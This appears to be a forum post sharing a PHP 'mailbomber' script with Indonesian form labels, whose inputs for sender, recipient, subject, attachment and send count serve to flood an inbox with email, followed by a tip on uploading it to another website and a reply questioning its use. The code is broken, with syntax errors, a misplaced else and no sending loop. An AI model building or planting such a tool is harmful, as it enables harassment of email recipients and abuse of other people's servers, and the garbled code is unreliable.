It looks like you're new here. If you want to get involved, click one of these buttons!
<style type=\"text/css\">
<!--
body {
background-color:#210707;
font-family: Courier New, Courier, monospace;
}
input {
background-color:#210707;
border:blue 1px solid;
color:cyan;
font-family: arial, verdana, ms sans serif;
font-size:12pt;
}
textarea {
background-color:#210707;
border:blue 1px solid;
color:cyan;
font-family:arial, verdana, ms sans serif;
font-size:10pt;
font-weigth:normal;
}
-->
</style>
<?php
echo \"<font color ='cyan'><marquee> mailbomber by vires modiif wendys182<marquee></font><br>\";
echo \"<br><font color='cyan'>Dari : </font><br>\";
echo \"<form action='post' action=?>\";
echo \"<input type='text' name='dari' size=30><br>\";
echo \"<font color='cyan'>untuk</font><br>\";
echo \"<input type='text' name='untuk' size=30><br>\";
echo \"<font color='cyan'>subjek</font><br>\";
echo \"<input type='text' name='subjek' size=50><br>\";
echo \"</form>\";
echo \"<form method='post' enctype='multipart/form-data' action=?>\";
echo \"<font color='cyan'>Sisipkan<font><br>\";
echo \"<input type='file' name='fileku'><br><br>\";
echo \"<font color='cyan'>isi email</font><br>\";
echo \"<textarea rows=10 cols=82 name='isi_email'></textarea><br><br>\";
echo \"<font color='cyan'>Direktori : </font>\";
echo \"<input type='text' name='direktori' value='<? getcwd() ?>' size=54><br>\";
echo \"<br><font color='cyan' > jumlah : </font>\";
echo \"<input type='text' name='jumlah' size=10><br>\";
echo \"<br><input type='submit' value='kirim'>\";
echo \"</form>\";
if ($_POST['kirim']) {
$isi=$_POST['isi_email'];
$pesan=urlencode($isi);
$pesan=ereg_replace(\"%5C%22\",\"%22\",$pesan\");
$pesan=urldecode($pesan);
$isi=$pesan;
$subjek=$_POST['subjek'];
$subjek=stripslashes($subjek);
if ($_FILES['fileku'] && $_POST['kirim']) {
$asal=$_FILES['fileku']['tmp_name'];
$tujuan=$_FILES['fileku']['name'];
if (!copy($asal,$tujuan) {
echo \"upload berhasil \" .$_FILES['fileku']['name']. \"<br><br>\";
}
$file=$_FILES['fileku']['name'];
$content=fread(fopen($file,\"r\"),filesize($file);
$content=chunk_split(base64_code($content));
else {
echo \"upload gagal\";
}
}
?>
to upload this file on some other website first u need to have access(editing) on other website
Why would you want to use this script to begin with?